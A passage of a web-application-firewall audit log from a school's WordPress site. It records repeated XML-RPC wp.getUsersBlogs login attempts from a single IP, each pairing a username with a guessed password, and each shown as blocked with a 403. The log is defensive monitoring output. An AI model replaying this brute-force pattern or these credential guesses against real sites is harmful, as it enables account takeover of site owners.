Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --91d0f862-C-- wp.getUsersBlogs admin Admin9876 --91d0f862-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --91d0f862-E-- --91d0f862-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (142+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776175378574 5924 (- - -) Stopwatch2: 1744776175378574 5924; combined=4055, p1=529, p2=3343, p3=0, p4=0, p5=108, sr=96, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91d0f862-Z-- --69d43b4e-A-- [16/Apr/2025:11:03:55 +0700] Z_8sK0-sESiKFppgz04X1QAAANc 103.236.140.4 52288 103.236.140.4 8181 --69d43b4e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 215 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --69d43b4e-C-- wp.getUsersBlogs admin work --69d43b4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69d43b4e-E-- --69d43b4e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (148+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776235198949 5284 (- - -) Stopwatch2: 1744776235198949 5284; combined=3737, p1=514, p2=3056, p3=0, p4=0, p5=99, sr=134, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69d43b4e-Z-- --99144223-A-- [16/Apr/2025:11:04:55 +0700] Z_8sZxk9XPLR9cFiTEu7vgAAAAc 103.236.140.4 52596 103.236.140.4 8181 --99144223-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --99144223-C-- wp.getUsersBlogs admin sunshine --99144223-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --99144223-E-- --99144223-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (146+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776295036209 4707 (- - -) Stopwatch2: 1744776295036209 4707; combined=3517, p1=380, p2=2925, p3=0, p4=0, p5=119, sr=82, sw=93, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99144223-Z-- --163f7663-A-- [16/Apr/2025:11:04:57 +0700] Z_8saSpe92T0H9-Aa0y26QAAAEM 103.236.140.4 52606 103.236.140.4 8181 --163f7663-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --163f7663-C-- wp.getUsersBlogs admin 1234%^&* --163f7663-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --163f7663-E-- --163f7663-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776297172096 4443 (- - -) Stopwatch2: 1744776297172096 4443; combined=3325, p1=372, p2=2763, p3=0, p4=0, p5=117, sr=101, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --163f7663-Z-- --18742434-A-- [16/Apr/2025:11:05:55 +0700] Z_8soype92T0H9-Aa0y3IwAAAE4 103.236.140.4 52894 103.236.140.4 8181 --18742434-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --18742434-C-- wp.getUsersBlogs admin diamond --18742434-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18742434-E-- --18742434-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (148+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776355012939 4234 (- - -) Stopwatch2: 1744776355012939 4234; combined=3292, p1=375, p2=2740, p3=0, p4=0, p5=102, sr=81, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18742434-Z-- --503c2123-A-- [16/Apr/2025:11:06:55 +0700] Z_8s3xk9XPLR9cFiTEu8oAAAABQ 103.236.140.4 53212 103.236.140.4 8181 --503c2123-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --503c2123-C-- wp.getUsersBlogs admin liverpool1 --503c2123-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --503c2123-E-- --503c2123-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (156+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776415191642 5420 (- - -) Stopwatch2: 1744776415191642 5420; combined=3781, p1=482, p2=3128, p3=0, p4=0, p5=101, sr=102, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --503c2123-Z-- --5f55e003-A-- [16/Apr/2025:11:07:55 +0700] Z_8tGype92T0H9-Aa0y3dQAAAEA 103.236.140.4 53490 103.236.140.4 8181 --5f55e003-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5f55e003-C-- wp.getUsersBlogs wakakur wakakur2018 --5f55e003-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f55e003-E-- --5f55e003-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (136+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776475712974 6168 (- - -) Stopwatch2: 1744776475712974 6168; combined=4301, p1=564, p2=3561, p3=0, p4=0, p5=105, sr=100, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f55e003-Z-- --50b23a59-A-- [16/Apr/2025:11:08:55 +0700] Z_8tVype92T0H9-Aa0y36wAAAEE 103.236.140.4 53800 103.236.140.4 8181 --50b23a59-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --50b23a59-C-- wp.getUsersBlogs wakakur marketing2010_ --50b23a59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --50b23a59-E-- --50b23a59-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (148+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776535306107 4615 (- - -) Stopwatch2: 1744776535306107 4615; combined=3420, p1=388, p2=2839, p3=0, p4=0, p5=110, sr=81, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50b23a59-Z-- --7e5f8378-A-- [16/Apr/2025:11:09:55 +0700] Z_8tk0-sESiKFppgz04Y0QAAANM 103.236.140.4 54122 103.236.140.4 8181 --7e5f8378-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7e5f8378-C-- wp.getUsersBlogs wakakur 123465 --7e5f8378-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e5f8378-E-- --7e5f8378-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (156+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776595085000 4578 (- - -) Stopwatch2: 1744776595085000 4578; combined=3468, p1=384, p2=2863, p3=0, p4=0, p5=123, sr=80, sw=98, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e5f8378-Z-- --b683b24b-A-- [16/Apr/2025:11:10:55 +0700] Z_8tzype92T0H9-Aa0y4VgAAAFI 103.236.140.4 54432 103.236.140.4 8181 --b683b24b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b683b24b-C-- wp.getUsersBlogs wakakur admin123456789 --b683b24b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b683b24b-E-- --b683b24b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (154+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776655310369 4321 (- - -) Stopwatch2: 1744776655310369 4321; combined=3256, p1=360, p2=2731, p3=0, p4=0, p5=96, sr=82, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b683b24b-Z-- --630ded25-A-- [16/Apr/2025:11:11:38 +0700] Z_8t-k-sESiKFppgz04ZGAAAAM8 103.236.140.4 54656 103.236.140.4 8181 --630ded25-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --630ded25-C-- wp.getUsersBlogs wakakur 1234%^&* --630ded25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --630ded25-E-- --630ded25-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776698324531 3355 (- - -) Stopwatch2: 1744776698324531 3355; combined=2502, p1=265, p2=2099, p3=0, p4=0, p5=83, sr=62, sw=55, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --630ded25-Z-- --0260926a-A-- [16/Apr/2025:11:11:55 +0700] Z_8uCxk9XPLR9cFiTEu9VAAAAAc 103.236.140.4 54746 103.236.140.4 8181 --0260926a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0260926a-C-- wp.getUsersBlogs wakakur baseball --0260926a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0260926a-E-- --0260926a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (156+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776715060113 4413 (- - -) Stopwatch2: 1744776715060113 4413; combined=3399, p1=371, p2=2834, p3=0, p4=0, p5=110, sr=82, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0260926a-Z-- --d0112c0a-A-- [16/Apr/2025:11:12:55 +0700] Z_8uR5VnVduWmh0dMDMTVQAAAIs 103.236.140.4 55064 103.236.140.4 8181 --d0112c0a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d0112c0a-C-- wp.getUsersBlogs wakakur senha --d0112c0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0112c0a-E-- --d0112c0a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (152+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776775221480 4293 (- - -) Stopwatch2: 1744776775221480 4293; combined=3190, p1=350, p2=2661, p3=0, p4=0, p5=103, sr=79, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0112c0a-Z-- --a11b1c01-A-- [16/Apr/2025:11:13:55 +0700] Z_8ug5VnVduWmh0dMDMToQAAAJA 103.236.140.4 55378 103.236.140.4 8181 --a11b1c01-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a11b1c01-C-- wp.getUsersBlogs wakakur tottenham1 --a11b1c01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a11b1c01-E-- --a11b1c01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (155+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776835169183 4346 (- - -) Stopwatch2: 1744776835169183 4346; combined=3387, p1=383, p2=2818, p3=0, p4=0, p5=107, sr=81, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a11b1c01-Z-- --2c74e644-A-- [16/Apr/2025:11:14:55 +0700] Z_8uv0-sESiKFppgz04ZVAAAAMM 103.236.140.4 55690 103.236.140.4 8181 --2c74e644-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2c74e644-C-- wp.getUsersBlogs wakahumas wakahumas1986 --2c74e644-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c74e644-E-- --2c74e644-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (155+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776895481434 4182 (- - -) Stopwatch2: 1744776895481434 4182; combined=3224, p1=355, p2=2665, p3=0, p4=0, p5=121, sr=79, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c74e644-Z-- --4192fa78-A-- [16/Apr/2025:11:15:55 +0700] Z_8u-ype92T0H9-Aa0y48QAAAEA 103.236.140.4 56000 103.236.140.4 8181 --4192fa78-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4192fa78-C-- wp.getUsersBlogs wakahumas Admin@321 --4192fa78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4192fa78-E-- --4192fa78-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (152+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776955021808 4318 (- - -) Stopwatch2: 1744776955021808 4318; combined=3305, p1=363, p2=2774, p3=0, p4=0, p5=98, sr=82, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 